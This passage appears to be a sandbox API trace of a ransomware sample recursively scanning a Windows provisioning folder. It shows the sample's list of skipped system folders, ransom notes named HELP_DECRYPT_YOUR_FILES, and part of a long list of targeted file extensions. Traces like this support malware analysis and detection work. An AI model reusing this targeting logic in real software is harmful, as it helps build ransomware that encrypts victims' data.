	[0171.927] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.927] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.928] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="temp") returned 0x0
	[0171.928] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.928] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="program files") returned 0x0
	[0171.928] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.928] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.928] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.929] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="appdata") returned 0x0
	[0171.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.929] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="application data") returned 0x0
	[0171.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.929] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="winnt") returned 0x0
	[0171.929] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.929] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="tmp") returned 0x0
	[0171.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.930] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="cache") returned 0x0
	[0171.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.930] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.930] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.930] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="webcache") returned 0x0
	[0171.931] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.931] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="inetcache") returned 0x0
	[0171.973] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.973] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="nvidia") returned 0x0
	[0171.973] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.974] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="packages") returned 0x0
	[0171.974] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.974] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="cookies") returned 0x0
	[0171.974] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.974] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\*.*", lpSrch="programdata") returned 0x0
	[0171.974] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0171.974] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0171.975] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7ffc49e4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80010ddc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="..", cAlternateFileName="")) returned 1
	[0171.975] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0171.975] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ffeac8c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ffeac8c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x80010ddc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0171.975] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ffc49e4, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ffc49e4, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ffeac8c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0171.975] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="RunTime", cAlternateFileName="")) returned 1
	[0171.975] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1
	[0171.975] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1
	[0171.976] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov"
	[0171.976] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\"
	[0171.976] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\", lpString2="RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime"
	[0171.976] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime"
	[0171.976] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\"
	[0171.976] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\"
	[0171.976] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*"
	[0171.976] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName=".", cAlternateFileName="")) returned 0xfb8f30
	[0171.977] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*") returned 97
	[0171.977] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.977] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*.*", cchLength=0x61 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*") returned 0x61
	[0171.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.978] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="windows") returned 0x0
	[0171.978] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.979] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="boot") returned 0x0
	[0171.979] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.979] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="system volume information") returned 0x0
	[0171.979] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.979] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0171.979] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.980] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="temp") returned 0x0
	[0171.980] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.980] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0171.980] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.980] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0171.980] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.981] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0171.981] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.981] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0171.981] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.981] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0171.981] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.982] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0171.982] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.982] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0171.982] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.982] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0171.982] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.982] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0171.982] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.983] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0171.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.983] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0171.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.983] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0171.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.984] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0171.984] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.984] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0171.984] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="..", cAlternateFileName="")) returned 1
	[0171.984] FindNextFileW (in: hFindFile=0xfb8f30, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0fddd6c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0fddd6c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x300037, dwReserved1=0x7d0066, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0171.984] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0171.985] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0171.985] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\"
	[0171.985] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml"
	[0171.985] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0171.985] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0171.985] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0171.985] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.986] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0171.986] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml"
	[0171.986] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\power_0.provxml") returned 109
	[0171.986] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0171.986] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.986] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0171.987] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0171.987] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpe